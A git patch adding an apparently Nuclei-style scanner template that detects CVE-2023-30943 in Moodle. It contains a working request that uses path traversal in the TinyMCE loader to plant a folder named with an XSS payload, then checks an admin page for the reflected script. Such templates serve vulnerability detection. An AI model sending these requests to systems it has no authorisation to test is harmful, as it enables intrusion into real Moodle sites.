From 83bb3b47664a673d7639325e4fa138c77d67b38c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 31 Aug 2023 10:04:29 +0530
Subject: [PATCH] Create CVE-2023-30943.yaml

---
 http/cves/2023/CVE-2023-30943.yaml | 45 ++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-30943.yaml

diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml
new file mode 100644
index 0000000000..897865c6d3
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30943.yaml
@@ -0,0 +1,45 @@
+id: CVE-2023-30943
+
+info:
+  name: Moodle - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.
+  reference:
+    - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30943
+  metadata:
+    max-request: 2
+  tags: cve,cve2023,moodle,xss
+
+http:
+  - raw:
+      - |
+        GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(1)>.png HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<img src=x onerror=alert(1)>"
+          - "moodle"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200